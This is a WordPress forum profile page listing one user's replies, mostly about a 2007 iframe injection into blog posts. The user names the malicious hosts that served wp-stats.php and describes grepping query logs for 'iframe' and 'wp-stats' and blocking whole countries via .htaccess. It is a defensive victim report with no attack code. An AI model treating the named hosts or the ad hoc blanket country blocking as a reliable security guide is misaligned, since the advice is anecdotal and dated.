keithwp
Forum Replies Created
-
Forum: Plugins
In reply to: [TablePress - Tables in WordPress made easy] Updating to 2.4.3 failsForum: Themes and Templates
In reply to: [Admired] Increasing main content width and/or flexible width?The link to my site is http://www.techtravels.org
I definitely need some specific suggestions on what to modify. I’ve got an approximate idea what to do, but the change seems spread out enough, that if someone could identify exactly what needs done would be really helpful!
Thanks
KeithForum: Fixing WordPress
In reply to: iframe injection problem?@duskglow: excellent work isolating the problem and identifying an instant workaround/fix.
Glad to see that the problem was found and the wordpress folks have released a patch.
I’m sure a couple people here are happy to find out that they really weren’t crazy after all. 🙂
Thanks
Forum: Fixing WordPress
In reply to: iframe injection problem?While my host was of very little help, I’ve taken a couple steps to help mitigate future problems.
I’m now backing up the db much more frequently, so I can compare and get an exact date when something was changed.
I started blocking China (amongst other countries) from my website wholesale via .htaccess.
I made a minor change to wp-db.php that records each and every query to a separate file with date/time and IP address stamps. My blog is not that busy/popular, and although its generating relatively large logs, space is available and cheap. Mind you, this is just sort of outbound queries to the database NOT the results from the queries. I tested both posts and edit posts, and if WP is being used in the commission of the crime, then I’ll have an entry with some information. I’ve been grep’ing the logs for “iframe” and “wp-stats” which I think is a very good indication something funny is going on.
thanks
Forum: Fixing WordPress
In reply to: iframe injection problem?I’m checking with my shared hosting provider if I can get access to the mysql logs.
In the interim, is there a way of determining when your particular wordpress installation was upgraded? Maybe looking at file dates? Or do database entries contain a version stamp of the WP that wrote it, etc?
Thanks
Forum: Fixing WordPress
In reply to: iframe injection problem?For what it’s worth, this happened to me as well.
Sometime between 10-31-2007 and today. AVG alerted one of my users today who reported
“AVG antivirus pops up two warnings: one for JS/Downloader Agent, and one for ‘Exploit.'”
Also iframes, hosts (www.)wp-stats-php.info and 61.132.75.71, both serving up wp-stats.php. As soon as I did a whois on the domains and saw they were China, I knew something was afoot.
I was either running wp version 2.2 OR 2.3.1, I simply can’t narrow everything down. Even if I knew when I upgraded to 2.3.1, I still don’t know when the attacker performed the SQL injection, or whatever it was.
I used phpadmin to search the database for “wp-stats” and that located the troublesome posts.
Is there any definitive answer yet as to how/why/only 2.2 was vulnerable, etc?
Thanks